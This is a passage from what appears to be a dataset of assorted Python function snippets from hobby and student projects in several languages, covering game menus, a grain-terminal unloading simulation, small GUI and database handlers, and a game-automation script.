self.medios_almacenamiento[\"Almacen 1\"])) \\\r\n and (len(self.recursos_atencion[\"Estacion Volcadora\"].cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8):\r\n\r\n transbordo = operaciones[\"Transbordo en sistema mecanizado (D)\"]\r\n ejecucion_transbordo = yield self.process(\r\n transbordo.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Tolva\"]))\r\n\r\n # En caso que no se ejecute el transbordo segenera y muestra un error\r\n if ejecucion_transbordo in [\"No ejecutada por recurso\", \"No ejecutada por producto\"]:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En otro caso, si se dispone espacio en Almacen 1 y, la cola de la volcadora es acepetable o\r\n # la cola de cuadrillas es muy larga, entonces, se descarga con sistema mecanicado a almacen.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and (len(self.recursos_atencion[\"Estacion Volcadora\"].cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8):\r\n\r\n descarga = operaciones[\"Descarga con volcadora\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En otro caso, si se dispone producto en almacen 1 y la cola de las cuadrillas es aceptable,\r\n # entonces, se transborda o descarga a pulso.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n # Si no hay posibilidad de que arriben camiones para transbordo, se descarga a pulso\r\n if len(self.recursos_atencion[\"Estacion Tolva/Balanza 3\"].cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8 \\\r\n or not camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En caso contrario, se transborda o descarga a pulso\r\n else:\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 20))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n descarga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n # En otro caso, si no se dispone producto en almacen 1 y la cola de las cuadrillas es aceptable,\r\n # entonces, se transborda a pulso.\r\n elif not camion.dispone_producto_espacio_medio_almacenamiento(self.medios_almacenamiento[\"Almacen 1\"]) \\\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\")))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # Manipuleo de carga a granel en almacenes externos\r\n elif camion.carga in [\"Grano de Soya\"]:\r\n\r\n # Si la cola de pala mecanica no es muy larga, se descarga a pulso.\r\n if len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8:\r\n\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n yield self.process(\r\n descarga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen Ext\"]))\r\n\r\n # En otro caso, se transborda o descarga a pulso\r\n else:\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 30))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n descarga = operaciones[\"Descarga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n descarga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))", "def mostrar_acerca_de():\n show_title(\"Informacion del Juego\")\n show_msg(\"\"\" ------------------------------\\n\"\"\")\n show_msg(\" - -\\n\")\n show_msg(\" - by: Valentina Diaz Arrieta -\\n\")\n show_msg(\" - -\\n\")\n show_msg(\" ------------------------------\\n\")\n raw_input(\"Enter para ir al menu principal \")\n return True", "def create():\n\tnombre = input(\"Ingrese el nombre de pokemon: \")\n\testado = input(\"Ingrese el estado. Si el pokemon no tiene estado, ingrese X: \")\n\n\tif estado.upper() == \"X\":\n\t\testado = None\n\n\tif estado not in estados_permitidos:\n\t\tprint(\"Estado de pokemon no permitido. Registro no fue insertado.\")\n\t\tprint(\"Devolviendo al menu principal...\")\n\t\treturn\n\n\thp_actual = int(input(\"Ingrese HP actual de pokemon: \"))\n\tfecha = input(\"Ingrese la fecha en formato DD/MM/YY HH24:MM (ej 06/09/20 14:20): \")\n\tinsertar_pokemon(nombre, hp_actual, estado, fecha)", "def menuPilas():\n print(\"\\nMenu:\"+\"\\n1. Insertar\\n2. Extraer\\n3. Visualizar\\n4. Salir\")\n while True: \n try:\n value=int(input(\"\\nIntroduzca la opcion que desea utilizar: \"))\n except:\n print(\"\\nWhoops! El valor que introdujiste no es un numero\")\n else:\n break\n return value", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def comando(accion,_):\r\n return array_comandos", "def ler_dados() -> None:\n opcoes = {\n '1': 'Visualizar pessoas cadastradas',\n '2': 'Visualizar veículos cadastrados'\n }\n\n opcao_escolhida = print_menu('VISUALIZAR DADOS', opcoes)\n\n limpa_console()\n if opcao_escolhida == '1':\n if select_todos_registros('pessoa'):\n print('='*100)\n print('Imprimindo todos os registros da tabela Pessoa:')\n print('='*100)\n print_pessoas()\n else:\n print('Não existe nenhuma pessoa cadastrada.')\n elif opcao_escolhida == '2':\n if select_todos_registros('veiculo'):\n print('='*100)\n print('Imprimindo todos os registros da tabela Veiculo:')\n print('='*100)\n print_veiculos()\n else:\n print('Não existe nenhum veículo cadastrado.')\n\n input('\\nPressione RETURN para voltar ao menu principal.')", "def PINTARPANTALLA(self):\n # Se configura la pantalla principal\n self.pantalla.title(\"Modelado de interiores\")\n self.pantalla.geometry(\"900x600\")\n\n # Se configura la pantalla del mapa interior\n self.telaMAPA.place(x=0, y=0)\n\n # Se configura la pantalla de control\n self.telaPANELDECONTROL.place(x=700, y=0)\n self.btnADDpunto.place(x=20, y=20)\n self.btnEliminarPunto.place(x=100, y=20)\n self.btnModificarPunto.place(x=20, y=60)\n self.btnLoadJSON.place(x=100, y=60)\n self.btnVerArbol.place(x=50, y=560)\n self.btnRepresetar.place(x=20, y=100)\n self.btnRepresetarPasoAPaso.place(x=20, y=140)\n self.btnConfiguracion.place(x=120, y=140)\n self.btnPlanoAlternativo.place(x=140, y=100)\n self.btnADDIMG.place(x=20, y=200)\n self.btnREMOVEIMG.place(x=120, y=200)\n # Se pintan los botones de los objetos de interior\n self.btnSilla.place(x=20, y=240)\n self.btnMesa.place(x=80, y=240)\n self.btnNevera.place(x=140, y=240)\n self.btnCama.place(x=20, y=290)\n self.btnSofa.place(x=80, y=290)\n self.btnTV.place(x=140, y=290)\n self.btnLampara.place(x=20, y=340)\n self.btnPlanta.place(x=80, y=340)\n self.btnSanitario.place(x=140, y=340)\n self.btnLavamanos.place(x=20, y=390)\n self.btnDucha.place(x=80, y=390)\n\n # Se pintan las lineas\n self.PINTARLEYENDAPLANOXY()\n # Se lanza el evento que actualiza la pantalla\n self.pantalla.after(0, self.update_graphic)\n self.pantalla.mainloop()", "def giaotranh():\n # printdb('def giaotranh')\n time.sleep(8)\n logging.info('def giao tranh')\n for x in range(6):\n screencap()\n # thấy next thì chuyển\n imgnext = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\next.png', 0.8)\n if imgnext.find() >= 1:\n # printdb('mạnh')\n danh()\n break\n else:\n if x == 5:\n check_loi_vethanh()\n else:\n time.sleep(2)", "def iniciarjuego():\r\n for i in range(4):\r\n if i == 1 or i == 0:\r\n color = (250,208,120,98)\r\n else:\r\n color = (159, 250, 120,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujarcuadrados(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (195, 139, 255,100)\r\n else:\r\n color = (250, 242, 120,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujarcirculos(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (250, 145, 137,98)\r\n else:\r\n color = (126, 139, 250,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujartriangulos(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (176, 255, 237,100)\r\n else:\r\n color = (255, 176, 228,100)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujardiamantes(x, color)\r\n cuadrados.remove(x)", "def danh():\n # printdb('def danh')\n imgmanh = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\longden.png', 0.77)\n time.sleep(1)\n # mạnh bỏ qua\n if imgmanh.find() >= 1:\n click_next()\n logging.info('Next')\n giaotranh()\n else:\n click_danh()\n #######################lỗi mạng######################\n time.sleep(30)\n screencap()\n error = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\error.png', 0.88)\n # printdb('check lỗi ')\n if error.find() >= 1: # check lỗi mạng\n check_loi_vethanh()\n else:\n time.sleep(cTimeWar) # 40s\n # Rutlui() #opt1 check khiên --end (rỉa 1 khiên)\n DanhTiep() # opt2 check nút hồi thành --end\n # click_rutlui() #opt3 chờ cTimeWar --End (đánh theo time chỉ định)\n #####################################################", "def Ingresar(frm):\r\n #se asigna el valor de la variable seguir\r\n \r\n #se le pide al usuario que ingresa la altura\r\n posinicial=float(frm.txtposinicial.GetValue())\r\n #posinicial=raw_input(\"Ingrese la altura desde donde se va dejar caer (en metros): \")\r\n #se condiona para que solo permite ingresar numero positivos \r\n \r\n posinicial=float(posinicial)\r\n if posinicial>0:\r\n posinicial=posinicial+2\r\n return posinicial", "def newprojCode_withNamed():\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\n\tproject_name = raw_input(\"*Nombre del Proyecto: \").lower()\n\n\tif project_name == \"\":\n\t\tcancel()\t\t#Si project_name esta vacio, se cierra directamente la aplicacion\n\n\tproject_languges = raw_input(\"*Lenguaje: \").upper()\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Se ha Creado el Proyecto\", pname, \"con Exito!!\"\n \n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 10000000)\t#Calcula numeros aleatorios de 1 a 10,000,000(10 millones)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def otra_partida():\r\n\r\n for jugador_1 in juego.get_jugadores():\r\n\r\n \"\"\"Va Iterando sobre todos los jugadores disponibles de uno en uno\"\"\"\r\n color.utilizarVerde()\r\n print(\"\\nEmpieza: {}\".format(jugador_1.get_jugado_nombre()))\r\n num1, num2 = juego.get_rangos()\r\n print(\"Rango de {} al {}\".format(num1, num2))\r\n jugador_1.set_jugador_intentos(4)\r\n intentos = jugador_1.get_jugador_intentos()\r\n numero_oculto = randint(num1, num2)\r\n puntos = jugador_1.get_jugador_puntuacion_total()\r\n\r\n while intentos >= 0:\r\n\r\n \"\"\"Empieza la partida con 4 Intentos hasta que se quede en 0\"\"\"\r\n\r\n try:\r\n color.utilizarVerde()\r\n numero = int(input(\"\\nIntroduce un Número: \"))\r\n color.utilizarAmarillo()\r\n print(\"Intetos Restantes: {}\".format(intentos - 1))\r\n if numero_oculto < numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Grande\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero_oculto > numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Pequeño\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero == numero_oculto:\r\n color.utilizarAzul()\r\n print(\"\\nHas Ganado en el {0} intento\".format(intentos))\r\n puntos += 1\r\n jugador_1.set_jugador_puntuacion_total(puntos)\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n elif numero != numero_oculto and intentos == 1:\r\n color.utilizarVerdeClarito()\r\n print(\"\\nEl número era {} :(\\n\".format(numero_oculto))\r\n color.utilizarRojo()\r\n print(format(\"GAME OVER\", \"-^75\"))\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n except (ValueError, NameError):\r\n print(\"\\nError: Tiene que ser un número ...\")", "def empezando_la_partida():\n #estas 2 funciones las importo al menu y al juego\n texto = ' Una vez empezada la partida se encuentran a disposición del jugador el tablero \\n'+\\\n 'y el atril con las fichas para poder jugar, simplemente dando click en la ficha\\n'+\\\n 'deseada y el casillero del tablero deseado podemos ir armando letra a letra la \\n'+\\\n 'palabra de nuestro turno, de esta forma, formando palabras válidas, aprovechando\\n'+\\\n 'los casilleros de bonus y evitando los casilleros de penalización, el jugador va\\n'+\\\n 'sumando puntos.\\n'+\\\n ' El objetivo del juego es obtener más puntos que la maquina antes de que se acabe\\n'+\\\n 'el tiempo, se acaben las fichas del juego o que ya no se puedan formar palabras.'\n return texto", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def main():\r\n\r\n print(\"Berikut adalah daftar naga yang tersedia.\")\r\n for naga in daftar_naga:\r\n naga.hp_sementara = naga.hp_maks\r\n print(naga)\r\n\r\n indeks_naga: int = int(input(\"Tolong masukkan indeks dari naga pilihan Anda: \"))\r\n while indeks_naga < 0 or indeks_naga >= len(daftar_naga):\r\n indeks_naga = int(input(\"Maaf, input Anda tidak sah! Tolong masukkan indeks dari naga pilihan Anda: \"))\r\n\r\n naga_pilihan: Naga = daftar_naga[indeks_naga]\r\n naga_musuh: Naga = daftar_naga[random.randint(0, len(daftar_naga) - 1)]\r\n print(naga_pilihan)\r\n print(naga_musuh)\r\n giliran: int = 0 # nilai semula\r\n while naga_pilihan.hp_sementara >= 0 and naga_musuh.hp_sementara >= 0:\r\n giliran += 1\r\n # Giliran Anda adalah ketika nilai 'giliran' itu ganjil dan giliran musuh adalah ketika nilai 'giliran'\r\n # itu genap\r\n if giliran % 2 == 1:\r\n print(naga_pilihan.serang(naga_musuh))\r\n else:\r\n print(naga_musuh.serang(naga_pilihan))\r\n\r\n if naga_musuh.hp_sementara < 0:\r\n print(\"Anda menang!!!\")\r\n break\r\n if naga_pilihan.hp_sementara < 0:\r\n print(\"Anda kalah!!!\")\r\n break\r\n\r\n print(\"Tekan Y untuk ya.\")\r\n print(\"Tekan tombol apapun yang lainnya untuk tidak.\")\r\n tanya: str = input(\"Apakah Anda mau bertarung lagi? \")\r\n if tanya == \"Y\":\r\n main()\r\n else:\r\n sys.exit()", "def bajar_pluma(self):\n self.pluma = self.pluma.cambiar_estado(True)", "def on_btnAltaServicioBasico_clicked(self,widget):\n try:\n conexion.cur.execute('select * from precios')\n precios = conexion.cur.fetchall()\n if(variables.lblCodigoReservaServicio.get_text()!=\"\"):\n codigoReservaServicio = variables.lblCodigoReservaServicio.get_text()\n if(variables.rbDesayuno.get_active()):\n existeDesayuno=False\n for registro in variables.listFactura:\n print(registro[0])\n if registro[0] == \"Desayuno\":\n existeDesayuno=True\n if existeDesayuno==False:\n precio=precios[0][0]\n concepto=\"Desayuno\"\n datos=(codigoReservaServicio,concepto,precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otro desayuno\"\n variables.vError.show()\n\n elif(variables.rbComida.get_active()):\n existeComida = False\n for registro in variables.listFactura:\n if registro[0] == \"Comida\":\n existeComida = True\n if existeComida == False:\n precio = precios[0][1]\n concepto = \"Comida\"\n datos = (codigoReservaServicio, concepto, precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otra comida\"\n variables.vError.show()\n\n\n if(variables.chkParking.get_active()):\n existeParking = False\n for registro in variables.listFactura:\n if registro[0] == \"Parking\":\n existeParking = True\n if existeParking == False:\n precio = precios[0][2]\n concepto = \"Parking\"\n datos = (codigoReservaServicio, concepto, precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otro servicio de parking\"\n variables.vError.show()\n\n\n variables.rbNinguno.set_active(True)\n variables.chkParking.set_active(False)\n funciones_servicios.listadoServicio(variables.listServicios,codigoReservaServicio)\n funciones_factura.listadoServicios(variables.listFactura,variables.codr,variables.lblHabitacionServicio.get_text())\n funciones_factura.calcularPreciosServicios()\n\n else:\n variables.mensajeError=\"Debes seleccionar un codigo de reserva\"\n variables.vError.show()\n\n\n except Exception as e:\n print(\"Error alta servicio\")\n print(e)", "def posicioAlParking(matricula):\n if(_formatMatriculaValid(matricula)):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking WHERE id_cotxe=?;\",(matricula,))\n row = cur.fetchone()\n if row:\n print \"El cotxe amb matricula\",matricula,\" es troba a la plaça\", row[0]\n else:\n print \"El coche amb matricula\",matricula,\"no es troba al parking\"\n\n except:\n pass\n con.close()\n else:\n print(\"Format matricula invalid per buscar la seva posicio.\")", "def main():\n titulo()\n top_10() #muestra el top10 cada vez que se inicie el juego\n print(\"{}Bienvenido ¿crees tener lo necesario para hundir mi flota?{}\".format(Fore.BLUE, Fore.RESET))\n sleep(2)\n print(\"{}No lo creo JAJAJA{}\".format(Fore.RED, Fore.RESET))\n continuar_jugando = True\n while continuar_jugando:\n print(\"\"\"\n Menu \n1) Jugar una partida\n2) Ver todos los usuarios\n3) Editar un usuario\n4) Ver el leaderboard\n5) Ver estadisticas\n6) Salir del Juego\n\"\"\")\n while True: #validacion para la opcion de menu elegida por el usuario\n try:\n elegir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if elegir < 1 or elegir > 6:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if elegir == 1:\n print(\"\\n\")\n lista_usuarios.append(datos_usuario())\n juego()\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 2:\n ver(edit=False)\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 3:\n print(\"\\n\")\n ver(edit = True)\n with open(\"Basedatos.txt\", \"r\") as bd:\n total = bd.readlines()\n largo = len(total)\n while True:\n try:\n seleccion = int(input(\"Seleccione el usuario que desee actualizar: \"))\n if seleccion > int(largo) or seleccion < 1:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n actualizar_datos(seleccion)\n sleep(1)\n print(\"Su usuario ha sido actualizado correctamente\")\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 4:\n top_10()\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 5:\n print(\"\\n\")\n promedio_disparos()\n puntos_genero()\n usuarios_edades()\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 6:\n continuar_jugando = False\n print(\"Te deseamos un feliz dia, gracias por jugar \" + Fore.LIGHTBLUE_EX + \"███ \" + \"BATTLESHIP\" + \" ███\" + Fore.RESET)\n sleep(1.25)\n top_10()", "def main():\n show_title(\"BENVENID@\")\n # Splash 10x10 matriz BOOTLOOP\n splash =[\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"U\",\"N\",\"A\",\"L\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"S\",\"O\",\"P\",\"A\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"D\",\"E\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"L\",\"E\",\"T\",\"R\",\"A\",\"S\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ]\n ]\n completar_matrix(splash, 10, False) \n mostrar_tablero(splash, 10) \n time.sleep(5) # Tiempo de espera 5 segundos\n clear_window()\n menu_inicial()", "def printMenu():\n print(\"\\nBienvenido\")\n print(\"1- Cargar Datos\")\n print(\"2- Contar los elementos de la Lista\")\n print(\"3- Contar elementos filtrados por palabra clave\")\n print(\"4- Consultar elementos a partir de dos listas\")\n print(\"5- Consultar buenas peliculas\")\n print(\"0- Salir\")", "def commands_sites(update: Update, context: CallbackContext) -> None:\n keyboard = [\n [\n InlineKeyboardButton(\"Diretta\", callback_data='/diretta'),\n InlineKeyboardButton(\"Probabili Formazioni\", callback_data='/fanta_probabili_formazioni'),\n ],\n [\n InlineKeyboardButton(\"Regolamento Leghe Private\", callback_data='/fanta_regolamento_leghe_private')\n ],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.message.reply_text('Comandi disponibili', 